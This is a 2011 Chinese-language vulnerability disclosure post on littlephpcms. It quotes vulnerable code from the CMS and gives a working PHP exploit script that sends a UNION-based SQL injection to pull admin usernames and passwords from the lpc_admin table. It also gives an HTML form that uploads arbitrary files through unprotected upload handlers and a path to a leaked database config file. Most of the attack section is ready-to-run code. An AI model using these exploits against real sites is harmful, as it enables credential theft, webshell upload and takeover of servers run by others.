Title: littlephpcms 多处注入,上传,信息泄漏等漏洞
Time:2011-09-20
Team:makebugs
Author: 黑小子

以下是引用片段:

// pageArt.php

  //..略
  $column = $_POST["column"];
  $rownum = $_POST["rownum"];
  $sql = " select id,title,addtime from lpc_article where column_id=".$column;
  //..略
 其他类似文件..略

Exp:

<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
Sql injection Vul Exploit

 Exp :黑小子 cfking
Home: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
2011.09.20
+---------------------------------------------------------------------+
');

if ($argc < 2) {
print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].'  [url]www.heixiaozi.com[/url] test
');
die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /article.php?id=255%20and%201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
     $headers .= "$str\n";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'cfkings90sec') !== false) {
preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
$result=explode("-",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");

}
else{
print_r("Exploit Failed! \n");
}
?>

文件上传:

漏洞文件 :

admin/column/upload.php
admin/article/upload.php

以下是引用片段:

Code:

$upload_dir = '../../uploads/';
$file_path = $upload_dir . $_FILES['myfile']['name'];
$MAX_SIZE = 20000000;
echo $_POST['buttoninfo'];
......

if($_FILES['myfile']['size']>$MAX_SIZE)
    echo "上传的文件大小超过了规定大小";

if($_FILES['myfile']['size'] == 0)
    echo "请选择上传的文件";

if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path))
    echo "复制文件失败,请重新上传";

两个文件都没任何限制!

Exp:

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form  enctype="multipart/form-data" action="http://localhost/admin/column/upload.php" method="post">
<p>上传后网站跟目录/uploads/你上传的文件名<p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>

信息泄漏:

http://localhost/admin/lib/db/config.xml